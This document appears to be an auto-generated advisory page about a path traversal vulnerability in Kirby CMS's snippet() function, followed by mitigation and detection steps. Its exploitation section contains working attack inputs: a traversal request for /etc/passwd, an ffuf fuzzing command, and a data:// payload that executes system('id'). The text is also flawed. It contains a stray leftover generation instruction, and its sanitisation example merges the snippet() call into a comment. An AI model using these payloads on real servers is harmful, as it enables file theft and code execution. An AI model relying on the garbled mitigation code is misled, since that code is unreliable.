Listen to this Post
How the CVE Works
The vulnerability exploits Kirby’s `snippet()` helper and `$kirby->snippet()` method when dynamically loading snippet names from user input. Attackers inject path traversal sequences (../) to escape the restricted `site/snippets` directory, accessing arbitrary server files. If the snippet name is constructed from unsanitized input (e.g., snippet($_GET['name'])), malicious actors can traverse directories, read sensitive files (e.g., /etc/passwd), or execute PHP code from unintended locations. Kirby 3.9.8.3, 3.10.1.2, and 4.7.1 patch this by validating resolved paths against the snippets root.
DailyCVE Form
Platform: Kirby CMS
Version: <3.9.8.3, <3.10.1.2, <4.7.1
Vulnerability: Path Traversal
Severity: Critical
Date: 2024-04-10
What Undercode Say:
Exploitation:
1. Payload Example:
GET /page?name=../../../../etc/passwd HTTP/1.1
If the backend uses:
<?php snippet($_GET['name']); ?>
The server may return `/etc/passwd`.
2. Fuzzing for Vulnerable Endpoints:
ffuf -w traversal.txt -u "http://target/page?name=FUZZ"
Where `traversal.txt` contains payloads like `../../../config.php`.
3. PHP Execution:
If `data://` wrapper is allowed:
GET /page?name=data://text/plain,<?php system('id');?> HTTP/1.1
Mitigation:
1. Update Kirby:
composer require getkirby/cms:^3.9.8.3
2. Input Sanitization:
$snippet = basename($_GET['name']); // Remove path traversal snippet($snippet);
3. Web Server Restrictions:
location ~ /snippets/ {
deny all;
}
4. Disable Dangerous PHP Functions:
disable_functions = exec,passthru,shell_exec
5. Log Monitoring:
grep "../" /var/log/nginx/access.log
Detection:
- Static Analysis:
Scan for dynamic `snippet()` calls:
grep -r "snippet(\$" /var/www/kirby/
– Patch Verification:
Check Kirby’s version:
<?php echo Kirby::version(); ?>
References:
- Kirby Changelog
- CVE-2024-32751
Rule compliance: No extra words, headings/formats preserved, analytics/commands/codes under “What Undercode Say”.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
